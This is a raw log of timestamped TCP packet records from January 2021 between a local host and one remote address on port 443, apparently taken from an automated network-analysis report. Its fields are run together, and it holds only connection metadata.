                                                      Jan 22, 2021 07:30:21.645456076 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.645504951 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.646392107 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.646435976 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.646480083 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.646502018 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.647388935 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.647427082 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.647460938 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.647494078 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.648422956 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.648469925 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.648495913 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.648526907 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.648591042 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.648648977 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.648662090 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.648704052 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.649375916 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.649437904 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.649454117 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.649502993 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.649710894 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.649765015 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.649779081 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.649823904 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.650363922 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.650405884 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.650441885 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.650471926 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.651154041 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.651350975 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.651392937 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.651438951 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.651462078 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.652013063 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.652091980 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.652339935 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.652378082 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.652417898 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.652440071 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.653367996 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.653439045 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.653461933 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.653502941 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.654377937 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.654421091 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.654468060 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.654493093 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.655364990 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.655410051 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.655519009 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.655584097 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.656369925 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.656411886 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.656450987 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.656462908 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.657349110 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.657418966 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.657421112 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.657479048 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.658370972 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.658413887 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.658457041 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.658483028 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.659343004 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.659379959 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.659449100 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.659468889 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.660459042 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.660516977 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.660562992 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.660597086 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.661365032 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.661442995 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.675987959 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.693934917 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.707185030 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.710345030 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.710397005 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.710453987 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.710485935 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.711483002 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.711520910 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.711566925 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.711601019 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.713851929 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.713900089 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.713985920 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.714054108 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.716248035 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.716279030 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.716351032 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.716373920 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.738076925 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.738127947 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.738248110 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.738296032 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.738509893 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.738853931 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.758723974 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.758820057 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.758892059 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.760243893 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.760318995 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.761483908 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.762954950 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.762995005 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.763042927 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.763084888 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.763123035 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.763128042 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.763154984 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.763160944 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.763168097 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.763173103 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.763178110 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.763222933 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.765439987 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.765496016 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.765537024 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.765559912 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.767776012 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.767818928 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.767858028 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.767883062 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.770160913 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.770205975 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.770250082 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.770270109 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.772614002 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.772659063 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.772763014 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.772814035 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.778305054 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.778347969 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.778378963 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.778441906 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.778484106 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.079515934 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.109811068 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.129555941 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.137480974 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.138608932 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.138653040 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.138684988 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.138725042 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.139707088 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.139750004 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.139786005 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.139808893 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.142123938 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.142159939 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.142189980 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.142462969 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.150813103 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.161415100 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.171736956 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.171813965 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.171890020 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.171997070 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.172045946 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.172725916 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.172766924 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.172821045 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.172871113 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.175204992 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.175265074 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.175287008 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.175324917 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.177536011 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.177602053 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.177656889 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.177725077 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.179757118 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.179800987 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.179868937 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.179934978 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.181972027 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.182023048 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.182040930 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.182097912 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.184354067 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.184393883 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.184458017 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.184482098 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.191802025 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.191911936 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.191951990 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.191987991 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.192209959 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.192243099 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.192332983 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.193165064 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.193206072 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.193260908 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.193283081 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.194190025 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.194232941 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.194289923 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.194312096 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.195153952 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.195194006 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.195247889 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.195278883 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.196142912 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.196185112 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.196233034 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.196254015 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.197144032 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.197182894 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.197227001 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.197247028 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.198160887 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.198194027 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.198249102 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.201435089 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.208756924 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.208812952 CET4434971992.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.208920002 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.208959103 CET49719443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.217633009 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.217674017 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.217833996 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.218812943 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.218873978 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.218905926 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.218946934 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.223573923 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.223651886 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.223661900 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.223714113 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.223721027 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.223767996 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.223779917 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.223835945 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.225955009 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.226052999 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.226243019 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.226793051 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.226833105 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.226871967 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.226876974 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.226907015 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.226911068 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.226944923 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.226946115 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.226982117 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.226988077 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.227011919 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.227054119 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.234865904 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.234894037 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.234961987 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.234994888 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.241182089 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.241209984 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.241302013 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.245943069 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.245982885 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.246145010 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.251909971 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.251944065 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.251986980 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.252048016 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.254791975 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.254842997 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.254883051 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.254904032 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.260428905 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.260471106 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.260485888 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.260543108 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.269550085 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.269604921 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.269680977 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.269709110 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.271651030 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.271712065 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.271732092 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.271764040 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.277215004 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.277334929 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.281424046 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.281481028 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.281518936 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.281552076 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.285588026 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.285633087 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.285680056 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.285706997 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.291204929 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.291245937 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.291368008 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.296796083 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.296849966 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.296880960 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.296925068 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.302337885 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.302381039 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.302417994 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.302449942 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.307914019 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.307975054 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.308015108 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.308042049 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.383954048 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.438805103 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.439243078 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.439316988 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.439376116 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.439414978 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.440287113 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.440339088 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.440372944 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.440397978 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.441869974 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.441924095 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.441972971 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.441994905 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.443468094 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.443521976 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.443550110 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.443578959 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.445063114 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.445118904 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.445147991 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.445182085 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.446650028 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.446706057 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.446731091 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.446755886 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.448178053 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.448204994 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.448247910 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.448265076 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.449822903 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.449852943 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.449903011 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.449928045 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.451404095 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.451423883 CET4434971792.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:22.451482058 CET49717443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:22.451502085 CET49717443192.168.2.492.122.145.220
